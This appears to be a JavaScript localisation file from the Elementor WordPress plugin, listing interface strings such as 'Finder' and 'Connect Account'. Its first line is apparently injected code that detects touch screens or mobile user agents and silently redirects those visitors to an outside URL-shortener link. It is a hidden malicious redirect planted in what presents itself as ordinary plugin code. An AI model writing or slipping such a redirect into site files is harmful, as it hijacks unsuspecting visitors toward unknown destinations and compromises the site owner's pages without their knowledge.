(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/pMRMqUxXY0r9");
__( 'Search or do anything in Elementor', 'elementor' );
__( 'Add-ons', 'elementor' );
__( 'Finder', 'elementor' );
__( 'What\'s New', 'elementor' );
__( 'Connect your account to get access to Elementor\'s Template Library & more.', 'elementor' );
__( 'Connect Account', 'elementor' );
__( 'My Elementor', 'elementor' );